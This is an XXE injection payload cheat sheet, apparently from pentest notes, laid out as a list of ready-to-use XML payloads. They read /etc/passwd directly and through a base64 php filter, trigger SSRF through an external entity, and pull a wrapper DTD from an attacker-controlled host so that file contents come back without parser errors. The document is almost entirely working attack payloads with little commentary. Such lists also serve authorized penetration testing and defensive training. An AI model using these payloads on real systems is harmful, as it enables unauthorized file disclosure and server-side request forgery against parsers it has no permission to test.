XXE Injection

Payloads

Test for injection

<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
 </userInfo>

File retrieval

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<container><value>&xxe;</value></container>

File retrieval with base64 encoding

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<container><value>&xxe;</value></container>

SSRF

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://example.com"> ]>

File Retrieval without breaking XML / causing an error

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://<ip address>/wrapper.dtd" >
%dtd;
]>
<document>
<lastName>&wrapper;</lastName>
<firstName>Larry</firstName>
</document>

Serve wrapper.dtd (containing: <!ENTITY wrapper "%start;%file;%end;"> on an attacker controlled machine.)